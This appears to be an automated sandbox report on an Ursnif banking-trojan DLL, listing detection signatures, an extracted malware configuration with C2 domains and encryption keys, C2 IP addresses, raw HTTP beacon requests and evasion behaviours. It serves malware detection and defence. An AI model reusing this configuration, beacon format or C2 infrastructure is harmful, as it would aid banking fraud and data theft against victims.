Windows Analysis Report
61ee6edf7de65.dll

Overview

General Information

Sample Name: 61ee6edf7de65.dll
Analysis ID: 558657
MD5: b6f0fc5638a110abac1a54805f77e786
SHA1: f7eff5f67b1b794759ec0ba9b0d6a3bd5cd59bfe
SHA256: 06e26611fe5cf2fb04cfa894f9cb24edc0ab8306cf42c979b2c776372d07d1cf
Tags: BRTdllgoziisfbursnif
Infos:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Writes or reads registry keys via WMI
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000003.00000002.498576168.00000000059E0000.00000040.00020000.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "bkFTFgKp65D5Jru5rf49R+GXnNukXGpZwjIwkjTtlHtgZk7oxIROD9a73bCW6q+N//ka8JpBA5kzPLmOYX0Yasr3Rl/9Zuz9f2VWaX0efOwZY2QKrOoQ67764YcBo8lsKwkYr7PpHkMHQxnMs6NEKJ6J1N6xfUndxmGR7l13Aaosa8p5sAWD3DLmA1KYT+Yo7POW4hnwwj/vfsWt00ns0kdIj1rxgp6FgYSdcYrFJsGyw1c4V2WgskLjtOH2H4NxYnKJgMX4ugqjKvCIFcuUg9umN2tNFjXLFbc81b/KRkQqTX8MMan6JAeAyuM92LJfIu2ZUFHAyr0vE+Uoz2nr6m8vyE3ODdwccpisKQUEL5E=", "c2_domain": ["giporedtrip.at", "habpfans.at"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "OejOdTRHaO03XbEm", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, calc no*ad *terminal* *debug*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "20000", "SetWaitableTimer_value": "1"}
Multi AV Scanner detection for submitted file
Source: 61ee6edf7de65.dll Virustotal: Detection: 24% Perma Link
Antivirus / Scanner detection for submitted sample
Source: 61ee6edf7de65.dll Avira: detected

Cryptography
barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F278F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_00F278F2

Compliance
barindex
Uses 32bit PE files
Source: 61ee6edf7de65.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: 61ee6edf7de65.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: :C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.pdbXP%a source: powershell.exe, 0000000D.00000002.1155485943.000002885CC78000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.pdb source: powershell.exe, 0000000D.00000002.1155485943.000002885CC78000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.462332100.0000000005180000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.450119700.00000000050C0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.439767157.0000000005FD0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.435425183.0000000005F10000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.pdb source: powershell.exe, 0000000D.00000002.1155485943.000002885CC78000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.462332100.0000000005180000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.450119700.00000000050C0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.439767157.0000000005FD0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.435425183.0000000005F10000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.pdbpsd1 source: powershell.exe, 0000000D.00000003.464647670.00000288719D5000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.pdbXP%a source: powershell.exe, 0000000D.00000002.1155485943.000002885CC78000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3B190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_04B3B190
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3B2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_04B3B2F7
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4D39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_04B4D39D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_059EB190
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059FD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_059FD39D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_059EB2F7
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4FD82 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_04B4FD82

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49760 -> 91.203.174.38:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49761 -> 138.36.3.134:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49762 -> 211.40.39.251:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49763 -> 61.98.7.132:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49763 -> 61.98.7.132:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49764 -> 91.203.174.38:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49764 -> 91.203.174.38:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49765 -> 121.136.102.4:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49765 -> 121.136.102.4:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 61.98.7.132 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: giporedtrip.at
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 138.36.3.134 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 91.203.174.38 80 Jump to behavior
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: LGDACOMLGDACOMCorporationKR LGDACOMLGDACOMCorporationKR
Source: Joe Sandbox View ASN Name: TEXNETSERVICOSDECOMUNICACAOEMINFORMATICALTDBR TEXNETSERVICOSDECOMUNICACAOEMINFORMATICALTDBR
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 211.40.39.251 211.40.39.251
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /drew/pNlxEnrdilKzWa9/68tqOS2uwrjSihitdE/jBbiWvTgb/3aw4cx4D47l6BXBjnON4/Fauxi0kACQab9CLvY1X/WoAQszl7aqCJx2eNbs5Szg/9_2BtMMZBWkCT/OWv_2Bj9/_2BPp2fGqVtSst7f7xYoQwH/mpPcfod9Hb/UB9Yz2aJsMDXWuTh9/ho2KCuunvmML/NRp1qNCJ2xT/_2BesCQrdlqKMQ/QvixSHRNiTVSEcLtfIY4h/0WwwQPgKD1/0.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/zeAIoWw0seSw/eyvrMUiMb_2/FvcVFvXTlvKA83/AIPgBBnSypPysLmbst0PO/R7_2FxsawNor7wTo/fZqlpG7O6GyhH5Q/ilir56XiQycslcZoXZ/qSVC_2BlG/P9i7TL0H4SKpkydIhuSL/MTdm8SLoRolWYl1Lf55/Lva_2F9tTa5U6IxpFvvIL3/Jp5Tc4NwzyFRW/sVu3oJPC/en2nnPkD5Bn3kVcHvqvqm4P/H0QeSd_2B7/IieOTNJjjpT/kGp.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/IZme6OdPQW/u_2BmYLEUfU47HJet/k_2FUef_2Bxu/bsWLGiszPFY/8oHJ6Ee5hmIU_2/F5_2BVoQk_2BruSTD534X/_2B8f_2Fo3zfeIoR/Yr0FSs5Yf6cdU04/FvQ5YxjburZ3dV1KGt/gPZeNVWrz/vabQEDTMtoB5FgDwNUIv/L2cDfpwTvEyFktn0LjD/BzBumu2cGGXpyFMbPhirpe/GFb8M35byGIHh/2IlxzLAp/4QmbK66L69oa601i8zszsD5/ozf.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/gpOOKQHU5/YopsneUUMix_2FGZrYk_/2FaCL9055O3rYKveg_2/BMYcLHEW_2B6_2BH1_2BIq/GCl9SqJ3zsF0h/uRiHRooG/iudFhrDMGJm_2FRN_2B6NM1/3JT_2Fq7zu/oEYGlG6hebhX439sT/jKSRQO714RRJ/qnfBGC5Rexs/FY6AfhSs_2BBga/CepUQnIMaDyzjxjJywQMp/Sbr0hGta57ccL2mG/IT9OtCUdHxKRc1l/X3mCPG6cz5ucxws3EJ/_2FMMYlE/Q.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/pT9VBE7JySNzTsraRHWIuA/M8mhqioMqf4SN/48wxFaOc/GQc3fQ5Dw6JPElmXEMT1WYW/8KiVfYSjGS/73gU4LPODDcjxF0SH/UKj5w7ReqWld/_2FD39lD5Kz/5xzi1kkBDyiun4/eX2QdVXKmn9zNv1_2Bebw/_2Bj1l2BOIC93Jzg/pa5W5iqolN8FKuR/6pqhw8soI60TcBnXsv/fUj7WBOr5/31qQZwplbi_2FEVv_2BA/_2Bg3LZPX_2FawVlqSQ/Z.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/OgX0J5PbJW4/wt7t22qhvnCn1v/lLndh_2BLbj_2BgCTZodo/VhmNj74z1QOstcs1/NN90KirQSsQ7O2C/HXs9eov9kNfgxo2ZRo/blD2X9oTA/M3ehnbfCXj_2BeiQgXKb/ucd0O60r4p_2FWGe4LI/GsQ05hEXJYX7DSeaALXgs4/LJcXahVRDT7HM/rEWRRjo9/OWoa99fWOrLG2ix_2FmfkKa/0wqwnttzjd/MMGwD_2BqOxL_2FmQ/i0rZ3L37/7n5Zr.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: loaddll32.exe, 00000001.00000003.445031558.00000000050A8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.428738020.0000000005EF8000.00000004.00000040.sdmp, control.exe, 00000016.00000003.445277854.000002ACC595C000.00000004.00000040.sdmp, control.exe, 0000001B.00000003.472405991.0000023ACE15C000.00000004.00000040.sdmp, control.exe, 0000001B.00000003.584670916.0000023ACE15C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000001.00000003.445031558.00000000050A8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.428738020.0000000005EF8000.00000004.00000040.sdmp, control.exe, 00000016.00000003.445277854.000002ACC595C000.00000004.00000040.sdmp, control.exe, 0000001B.00000003.472405991.0000023ACE15C000.00000004.00000040.sdmp, control.exe, 0000001B.00000003.584670916.0000023ACE15C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: loaddll32.exe, 00000001.00000003.390336190.00000000015A3000.00000004.00000001.sdmp String found in binary or memory: http://giporedtrip.at/
Source: loaddll32.exe, 00000001.00000003.393869769.00000000015A5000.00000004.00000001.sdmp String found in binary or memory: http://giporedtrip.at/drew/OgX0J5PbJW4/wt7t22qhvnCn1v/lLndh_2BLbj_2BgCTZodo/VhmNj74z1QOstcs1/NN90Kir
Source: loaddll32.exe, 00000001.00000003.390336190.00000000015A3000.00000004.00000001.sdmp String found in binary or memory: http://giporedtrip.at/drew/pT9VBE7JySNzTsraRHWIuA/M8mhqioMqf4SN/48wxFaOc/GQc3fQ5Dw6JPElmXEMT1WYW/8Ki
Source: loaddll32.exe, 00000001.00000003.393869769.00000000015A5000.00000004.00000001.sdmp String found in binary or memory: http://giporedtrip.at/v
Source: loaddll32.exe, 00000001.00000003.445031558.00000000050A8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.428738020.0000000005EF8000.00000004.00000040.sdmp, control.exe, 00000016.00000003.445277854.000002ACC595C000.00000004.00000040.sdmp, control.exe, 0000001B.00000003.472405991.0000023ACE15C000.00000004.00000040.sdmp, control.exe, 0000001B.00000003.584670916.0000023ACE15C000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 0000000D.00000002.598284700.000002885961F000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.597986982.0000028859411000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.598284700.000002885961F000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001A.00000000.473037599.000000000095C000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.484749682.000000000095C000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.446859697.000000000095C000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.475140198.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 0000000D.00000002.598284700.000002885961F000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: unknown DNS traffic detected: queries for: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/pNlxEnrdilKzWa9/68tqOS2uwrjSihitdE/jBbiWvTgb/3aw4cx4D47l6BXBjnON4/Fauxi0kACQab9CLvY1X/WoAQszl7aqCJx2eNbs5Szg/9_2BtMMZBWkCT/OWv_2Bj9/_2BPp2fGqVtSst7f7xYoQwH/mpPcfod9Hb/UB9Yz2aJsMDXWuTh9/ho2KCuunvmML/NRp1qNCJ2xT/_2BesCQrdlqKMQ/QvixSHRNiTVSEcLtfIY4h/0WwwQPgKD1/0.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/zeAIoWw0seSw/eyvrMUiMb_2/FvcVFvXTlvKA83/AIPgBBnSypPysLmbst0PO/R7_2FxsawNor7wTo/fZqlpG7O6GyhH5Q/ilir56XiQycslcZoXZ/qSVC_2BlG/P9i7TL0H4SKpkydIhuSL/MTdm8SLoRolWYl1Lf55/Lva_2F9tTa5U6IxpFvvIL3/Jp5Tc4NwzyFRW/sVu3oJPC/en2nnPkD5Bn3kVcHvqvqm4P/H0QeSd_2B7/IieOTNJjjpT/kGp.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/IZme6OdPQW/u_2BmYLEUfU47HJet/k_2FUef_2Bxu/bsWLGiszPFY/8oHJ6Ee5hmIU_2/F5_2BVoQk_2BruSTD534X/_2B8f_2Fo3zfeIoR/Yr0FSs5Yf6cdU04/FvQ5YxjburZ3dV1KGt/gPZeNVWrz/vabQEDTMtoB5FgDwNUIv/L2cDfpwTvEyFktn0LjD/BzBumu2cGGXpyFMbPhirpe/GFb8M35byGIHh/2IlxzLAp/4QmbK66L69oa601i8zszsD5/ozf.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/gpOOKQHU5/YopsneUUMix_2FGZrYk_/2FaCL9055O3rYKveg_2/BMYcLHEW_2B6_2BH1_2BIq/GCl9SqJ3zsF0h/uRiHRooG/iudFhrDMGJm_2FRN_2B6NM1/3JT_2Fq7zu/oEYGlG6hebhX439sT/jKSRQO714RRJ/qnfBGC5Rexs/FY6AfhSs_2BBga/CepUQnIMaDyzjxjJywQMp/Sbr0hGta57ccL2mG/IT9OtCUdHxKRc1l/X3mCPG6cz5ucxws3EJ/_2FMMYlE/Q.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/pT9VBE7JySNzTsraRHWIuA/M8mhqioMqf4SN/48wxFaOc/GQc3fQ5Dw6JPElmXEMT1WYW/8KiVfYSjGS/73gU4LPODDcjxF0SH/UKj5w7ReqWld/_2FD39lD5Kz/5xzi1kkBDyiun4/eX2QdVXKmn9zNv1_2Bebw/_2Bj1l2BOIC93Jzg/pa5W5iqolN8FKuR/6pqhw8soI60TcBnXsv/fUj7WBOr5/31qQZwplbi_2FEVv_2BA/_2Bg3LZPX_2FawVlqSQ/Z.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/OgX0J5PbJW4/wt7t22qhvnCn1v/lLndh_2BLbj_2BgCTZodo/VhmNj74z1QOstcs1/NN90KirQSsQ7O2C/HXs9eov9kNfgxo2ZRo/blD2X9oTA/M3ehnbfCXj_2BeiQgXKb/ucd0O60r4p_2FWGe4LI/GsQ05hEXJYX7DSeaALXgs4/LJcXahVRDT7HM/rEWRRjo9/OWoa99fWOrLG2ix_2FmfkKa/0wqwnttzjd/MMGwD_2BqOxL_2FmQ/i0rZ3L37/7n5Zr.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.385104161.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359568367.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384820134.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472405991.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359628903.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.365461570.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.584670916.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359660844.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384544638.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384666912.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445277854.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445091094.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.385135380.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445408460.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359611045.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.376576771.0000000004FCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384983299.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359512157.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.444990787.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384911047.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359647508.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.428738020.0000000005EF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.385049802.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472502458.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472298096.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.393830372.0000000003C6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472531811.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359541703.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359590748.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.445031558.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 912, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 6104, type: MEMORYSTR

E-Banking Fraud
barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.385104161.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359568367.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384820134.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472405991.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359628903.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.365461570.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.584670916.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359660844.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384544638.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384666912.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445277854.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445091094.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.385135380.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445408460.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359611045.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.376576771.0000000004FCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384983299.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359512157.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.444990787.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384911047.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359647508.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.428738020.0000000005EF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.385049802.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472502458.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472298096.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.393830372.0000000003C6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472531811.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
